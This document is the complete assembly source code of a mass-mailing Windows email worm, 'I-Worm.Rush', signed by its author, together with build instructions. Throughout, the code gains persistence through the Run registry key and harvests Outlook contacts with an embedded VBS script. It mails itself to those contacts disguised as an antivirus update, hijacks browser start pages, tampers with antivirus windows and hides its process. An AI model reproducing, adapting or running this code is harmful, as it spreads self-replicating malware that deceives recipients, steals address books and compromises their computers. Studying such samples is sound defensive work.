comment # Name : I-Worm.Rush Author : PetiK Date : August 27th - September 2nd Size : 5632 byte (compiled with UPX tool) Action : Copy itself to * WINDOWS\SYSTEM\Mail32.exe Add in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value * Mail Outlook = WINDOWS\SYSTEM\Mail32.exe * On Wednesday it opens the cdrom * The 3rd it produces a sound * the 15th it alters "Search Page", "Start Page", and "Local Page" by * Creates %personal%\Read_Me.txt with a text * A vbs file search all email in the Oultook software and put them in the Mailbook.txt. The worm scans the file to find email. Subject : New Scan Virus... Body : Hi man, I send you the last update of ScanVir (v 2.5). Look at the file attached. Bye and have a nice day. Attached : ScanVir_25.exe * Scans title of windows : - Norton AntiVirus => Norton Virus : W32.Norton.Worm@mm - System Properties => Minimize the window To build the worm: @echo off tasm32 /ml /m9 Rush tlink32 -Tpe -c -x -aa Rush,,,import32,dllz upx -9 Rush.exe if exist *.obj del *.obj if exist *.map del *.map To delete the worm: del %windir%\system\Mail32.exe del %personal%\Read_Me.txt del %windir%\MailBook.txt # .586p .model flat .code JUMPS callx macro a extrn a:proc call a endm include useful.inc include myinclude.inc start: ;call hide_worm twin_worm: push 50 mov esi,offset orig_worm push esi push 0 callx GetModuleFileNameA mov edi,offset copy_worm push edi push 50 push edi callx GetSystemDirectoryA add edi,eax mov eax,"iaM\" stosd mov eax,".23l" stosd mov eax,"exe" stosd pop edi push 0 push edi push esi callx CopyFileA push 8 push edi push 1 @pushsz "Mail Outlook" @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" push 80000002h callx SHSetValueA check_date: push offset SystemTime callx GetSystemTime cmp [SystemTime.wDayOfWeek],03h jne beep1 cdrom_open: push 00h push 00h push 00h @pushsz "open cdaudio" callx mciSendStringA push 00h push 00h push 00h @pushsz "set cdaudio door open" callx mciSendStringA beep1: push offset SystemTime callx GetSystemTime cmp [SystemTime.wDay],03h jne special_folder mov counter,0 beep2: inc counter push 30h callx MessageBeep push 1 callx Sleep cmp counter,5000 jne beep2 special_folder: push 00h push 05h push offset personal push 00h callx SHGetSpecialFolderPathA @pushsz "\Read_Me.txt" push offset personal callx lstrcat txt_file: push 00h push 01h push 02h push 00h push 01h push 40000000h push offset personal callx CreateFileA mov [FileHdl],eax push 00h push offset octets push TXTSIZE push offset txtd push [FileHdl] callx WriteFile push [FileHdl] callx CloseHandle vbs_file: pushad push 00h push 80h push 02h push 00h push 01h push 40000000h @pushsz "C:\rushhour.vbs" callx CreateFileA xchg edi,eax push 00h push offset octets push VBSSIZE push offset vbsd push edi callx WriteFile push edi callx CloseHandle popad push 1 @pushsz "wscript C:\rushhour.vbs" callx WinExec push 2000 callx Sleep @pushsz "C:\rushhour.vbs" callx DeleteFileA push offset SystemTime callx GetSystemTime cmp [SystemTime.wDay],0Fh jne start_scan call internet_page start_scan: mov edi,offset mailbook push edi push 50 push edi callx GetWindowsDirectoryA add edi,eax mov eax,"iaM\" stosd mov eax,"ooBl" stosd mov eax,"xt.k" stosd mov ax,"t" stosd xor eax,eax stosd open_scan_file: pushad push 00h push 80h push 03h push 00h push 01h push 80000000h push offset mailbook callx CreateFileA inc eax je not_exist dec eax xchg eax,ebx xor eax,eax push eax push eax push eax push 2 push eax push ebx callx CreateFileMappingA test eax,eax je F1 xchg eax,ebp xor eax,eax push eax push eax push eax push 4 push ebp callx MapViewOfFile test eax,eax je F2 xchg eax,esi push 0 push ebx callx GetFileSize cmp eax,3 jbe F3 scan_file: xor edx,edx mov edi,offset mail_addr push edi p_c: lodsb cmp al," " je car_s cmp al,0dh je entr1 cmp al,0ah je entr2 cmp al,"#" je f_mail cmp al,"@" jne not_a inc edx not_a: stosb jmp p_c car_s: inc esi jmp p_c entr1: xor al,al stosb pop edi test edx,edx je scan_file call send_mail jmp scan_file entr2: xor al,al stosb pop edi jmp scan_file f_mail: F3: push esi callx UnmapViewOfFile F2: push ebp callx CloseHandle F1: push ebx callx CloseHandle not_exist: popad scan_window:mov counter,0 win1: inc counter cmp counter,1000000 je end_w @pushsz "Norton AntiVirus" push 00h callx FindWindowA test eax,eax jz win2 jmp change_nav win2: @pushsz "System Properties" push 00h callx FindWindowA test eax,eax jz win3 jmp show_window win3: @pushsz "Microsoft Home Page - Microsoft Internet Explorer" push 00h callx FindWindowA test eax,eax jz win1 jmp display_message change_nav: mov edi,eax @pushsz "Norton Virus : W32.Norton.Worm@mm" push edi callx SetWindowTextA jmp win1 show_window: mov edi,eax push 2 push edi callx ShowWindow jmp win1 display_message: mov edi,eax push 10h @pushsz "Microsoft Internet Explorer" @pushsz "You don't have access to this page" push 00h callx MessageBoxA push 0 push edi callx ShowWindow jmp win1 end_w: push 00h callx ExitProcess hide_worm: pushad @pushsz "Kernel32.dll" callx GetModuleHandleA xchg eax,ecx jecxz end_hide_worm @pushsz "RegisterServiceProcess" push ecx callx GetProcAddress xchg eax,ecx jecxz end_hide_worm push 1 push 0 call ecx end_hide_worm: popad ret internet_page: pushad call diff_val db "Search Page",0 db "Start Page",0 db "Local Page",0 diff_val: pop esi push 3 pop ecx page_loop: push ecx push 32 @pushsz "http://www.petik.fr.fm" push 1 push esi @pushsz "Software\Microsoft\Internet Explorer\Main" push 80000001h callx SHSetValueA @endsz pop ecx loop page_loop popad ret send_mail: xor eax,eax push eax push eax push offset Message push eax push [MAPIHdl] callx MAPISendMail ret .data ; === copy_worm === orig_worm db 50 dup (0) copy_worm db 50 dup (0) ; === beep === counter dd ? ; === special_folder === personal db 70 dup (0) octets dd ? FileHdl dd ? ; === scan email === mailbook db 50 dup (0) mail_addr db 128 dup (?) MAPIHdl dd 0 name_mail db "ScanVir_25.exe",0 subject db "New Scan Virus...",0 body db "Hi man,",0dh,0ah db "I send you the last update of ScanVir (v 2.5).",0dh,0ah db "Look at the file attached.",0dh,0ah,0dh,0ah db 09h,09h,09h,09h,"Bye and have a nice day.",0 namefrom db "Your Best Friend",0 Message dd ? dd offset subject dd offset body dd ? dd ? dd ? dd 2 dd offset MsgFrom dd 1 dd offset MsgTo dd 1 dd offset Attach MsgFrom dd ? dd namefrom dd ? dd ? dd ? MsgTo dd ? dd 1 dd offset mail_addr dd offset mail_addr dd ? dd ? Attach dd ? dd ? dd ? dd offset orig_worm dd offset name_mail dd ? txtd: db "Hi man,",0dh,0ah,0dh,0ah db "I don't want to destroy your computer.",0dh,0ah db "But other programs are more dangerous.",0dh,0ah,0dh,0ah,0dh,0ah db 09h,09h,09h,"PetiK",00h TXTSIZE equ $-txtd vbsd: db 'On Error Resume Next',0dh,0ah db 'Set rush=CreateObject("Outlook.Application")',0dh,0ah db 'Set chan=rush.GetNameSpace("MAPI")',0dh,0ah db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'Set txt=fso.CreateTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt")',0dh,0ah db 'txt.Close',0dh,0ah db 'For Each M In chan.AddressLists',0dh,0ah db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah db 'For O=1 To M.AddressEntries.Count',0dh,0ah db 'Set P=M.AddressEntries(O)',0dh,0ah db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt",8,true)',0dh,0ah db 'txt.WriteLine P.Address',0dh,0ah db 'txt.Close',0dh,0ah db 'Next',0dh,0ah db 'End If',0dh,0ah db 'Next',0dh,0ah db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt",8,true)',0dh,0ah db 'txt.WriteLine "#"',0dh,0ah db 'txt.Close',0dh,0ah VBSSIZE equ $-vbsd signature db "I-Worm.Rush",00h origine db "A worm made in France",00h author db "Written by PetiK - 2001",00h end start end